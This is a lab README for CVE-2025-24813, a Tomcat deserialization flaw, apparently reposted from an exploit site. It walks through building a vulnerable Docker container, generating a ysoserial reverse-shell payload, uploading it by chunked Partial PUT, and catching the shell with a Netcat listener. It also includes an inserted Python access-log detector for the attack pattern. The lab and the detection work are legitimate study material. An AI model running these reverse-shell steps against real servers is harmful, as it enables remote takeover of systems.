## https://sploitus.com/exploit?id=D3C1F211-5F09-5911-94C6-35C116BCCCBF
---
tags: [tomcat, cve-2025-24813, java, rce, reverse-shell, lab]
title: 🧪 CVE-2025-24813 Tomcat RCE Lab (Docker + ysoserial)
---

🧪 **CVE-2025-24813 Tomcat RCE Lab (Docker + ysoserial)**

This lab demonstrates remote code execution via unsafe Java deserialization in a Tomcat-hosted app that processes serialized session files. The full environment runs in Docker with a crafted reverse shell payload delivered via a Partial PUT request.

---

πŸ“ **Directory Layout**

```
.
├── 0-run-tomcat.sh        # Build + run vulnerable Tomcat container
├── 1-generate-revshell.sh # Start Netcat reverse shell listener
├── 2-generate-payload.sh  # Generate ysoserial reverse shell payload
├── 3-upload-file.sh       # Upload serialized payload via Partial PUT
├── 4-exploit.sh           # Trigger deserialization endpoint
├── readme.md              # This file
├── source.sh              # Sets CALLBACK_IP, LISTENER_PORT, etc.
├── dummy-app/
│   ├── src/
│   │   └── main/java/com/example/DeserializeServlet.java
│   ├── pom.xml
│   └── Dockerfile
```

---

βš™οΈ **Prerequisites**

Install Java and Netcat:

```
brew install openjdk netcat
```

Ensure you're using JDK 11+ and allow ysoserial access to JDK internals via `--add-opens` (the module system blocks this access by default).

---

🧨 **Exploit Flow**

1. 🛠 Build and run vulnerable Tomcat  
2. 🐚 Start reverse shell listener  
3. 💣 Generate ysoserial payload (`CommonsBeanutils1`)  
4. 📤 Upload payload using HTTP Partial PUT  
5. 🎯 Trigger deserialization and catch shell  

---

🧪 **Usage**

### 1. Build and run vulnerable Tomcat

```
bash 0-run-tomcat.sh
```

---

### 2. Set environment variables

Create a `source.sh` file like this:

```
export CALLBACK_IP="your.lan.ip"
export LISTENER_PORT=4444
export PAYLOAD_FILE="rev_shell.ser"
export TARGET_URL="http://localhost:8080/xxx-api/gopan.session"
export CHUNK_SIZE=100
```

Then source it:

```
source source.sh
```

---

### 3. Start reverse shell listener

In a separate terminal:

```
bash 1-generate-revshell.sh
```

This runs:

```
nc -lnvp 4444
```

---

### 4. Generate the payload

```
bash 2-generate-payload.sh
```

This will:

- Download `ysoserial.jar` if needed  
- Generate a `CommonsBeanutils1` payload with reverse shell  
- Save it as `rev_shell.ser`  

---

### 5. Upload the payload

```
bash 3-upload-file.sh
```

This script uploads the serialized payload as an HTTP Partial PUT, sending it in `CHUNK_SIZE`-byte chunks with a `Content-Range` header on each request.

---

### 6. Trigger the exploit

```
bash 4-exploit.sh
```

This hits:

```
http://localhost:8080/xxx-api/profile
```

Which deserializes the uploaded file and executes the payload.

> ✅ You'll get a reverse shell in the Netcat terminal!
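From the defender's side, the two steps above (chunked `PUT` with `Content-Range` to a `.session` file in a webapp directory, followed shortly by a request that triggers deserialization) are visible in the Tomcat access log. The following script is an added example, not part of this lab or of Tomcat, that parses constructed access-log lines and flags that pattern. It assumes the `AccessLogValve` pattern has been extended to log the request's `Content-Range` header (`%{Content-Range}i`) as a trailing quoted field; the log lines, IPs and timestamps are constructed for the example, and the `.ser` extension in the watch list is an addition beyond the `.session` name used in this lab.

```python
import re
from datetime import datetime

# Assumed AccessLogValve pattern (not from the lab):
#   %h %l %u %t "%r" %s %b "%{Content-Range}i"
LOG_RE = re.compile(
    r'^(?P<ip>\S+) \S+ \S+ \[(?P<ts>[^\]]+)\] '
    r'"(?P<method>[A-Z]+) (?P<path>\S+) [^"]*" (?P<status>\d{3}) \S+ '
    r'"(?P<crange>[^"]*)"$'
)

# File extensions that a static-file PUT should never write; .session matches this
# lab's upload target, .ser is a generalization for other serialized-object drops.
SUSPICIOUS_EXT = (".session", ".ser")
TRIGGER_WINDOW_S = 300  # how long after an upload a follow-up request is correlated

# Constructed sample log (not captured from a real system): three partial-PUT chunks
# to a .session file, the trigger request, an unrelated client, and a benign upload.
SAMPLE_LOG = """\
10.0.0.5 - - [01/Apr/2025:12:00:01 +0000] "PUT /xxx-api/gopan.session HTTP/1.1" 204 - "bytes 0-99/300"
10.0.0.5 - - [01/Apr/2025:12:00:02 +0000] "PUT /xxx-api/gopan.session HTTP/1.1" 204 - "bytes 100-199/300"
10.0.0.5 - - [01/Apr/2025:12:00:03 +0000] "PUT /xxx-api/gopan.session HTTP/1.1" 204 - "bytes 200-299/300"
10.0.0.5 - - [01/Apr/2025:12:00:05 +0000] "GET /xxx-api/profile HTTP/1.1" 500 - "-"
10.0.0.9 - - [01/Apr/2025:12:00:07 +0000] "GET /xxx-api/profile HTTP/1.1" 200 512 "-"
10.0.0.7 - - [01/Apr/2025:12:01:00 +0000] "PUT /uploads/report.pdf HTTP/1.1" 201 - "bytes 0-1023/4096"
"""


def parse_line(line):
    """Parse one access-log line into a dict, or return None if it does not match."""
    m = LOG_RE.match(line)
    if not m:
        return None
    entry = m.groupdict()
    entry["ts"] = datetime.strptime(entry["ts"], "%d/%b/%Y:%H:%M:%S %z")
    entry["status"] = int(entry["status"])
    # A Content-Range header on a PUT is what makes it a partial PUT.
    entry["partial"] = entry["crange"] not in ("", "-")
    return entry


def webapp_of(path):
    """Return the context name, e.g. '/xxx-api/profile' -> 'xxx-api'."""
    parts = path.split("/", 2)
    return parts[1] if len(parts) > 1 else ""


def analyze(log_text):
    """Return findings for partial PUTs of serialized files and for upload-then-trigger sequences."""
    findings = []
    last_partial_put = {}  # (client ip, webapp) -> (timestamp, uploaded path)
    for raw in log_text.splitlines():
        e = parse_line(raw)
        if e is None:
            continue
        app = webapp_of(e["path"])
        if e["method"] == "PUT" and e["partial"] and e["path"].lower().endswith(SUSPICIOUS_EXT):
            findings.append({"rule": "partial-put-serialized", "ip": e["ip"],
                             "path": e["path"], "ts": e["ts"]})
            last_partial_put[(e["ip"], app)] = (e["ts"], e["path"])
        elif e["method"] in ("GET", "POST") and (e["ip"], app) in last_partial_put:
            put_ts, put_path = last_partial_put[(e["ip"], app)]
            # Same client hitting the same webapp shortly after dropping a serialized file.
            if 0 <= (e["ts"] - put_ts).total_seconds() <= TRIGGER_WINDOW_S:
                findings.append({"rule": "upload-then-trigger", "ip": e["ip"],
                                 "upload": put_path, "trigger": e["path"], "ts": e["ts"]})
                del last_partial_put[(e["ip"], app)]
    return findings


if __name__ == "__main__":
    for f in analyze(SAMPLE_LOG):
        print(f)
```

The `partial-put-serialized` rule fires on its own and is the higher-confidence signal, since a read-only DefaultServlet never accepts a PUT at all; the `upload-then-trigger` rule only adds context about which request consumed the file. Run against a real log, the script should be fed the output of a valve configured with the pattern in the comment.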

---

πŸ” **Debugging**

Inside the container:

```
docker exec -it vulnerable-tomcat bash
cd /usr/local/tomcat/webapps/xxx-api/
ls -l
```

If you are testing with a safe payload, check whether the file `/tmp/beanutils-worked` exists inside the container.

---

💡 **Notes**

- Payloads require `--add-opens` to bypass module restrictions in Java 11+
- Reverse shell might fail silently if `/bin/bash` isn't available (try `/bin/sh`)
- You can safely test code execution with: `touch /tmp/rce-worked`

---

🧱 **Based On**

- [frohoff/ysoserial](https://github.com/frohoff/ysoserial)
- Apache Tomcat 9.x
- Java deserialization exploit chains (CommonsBeanutils1)

---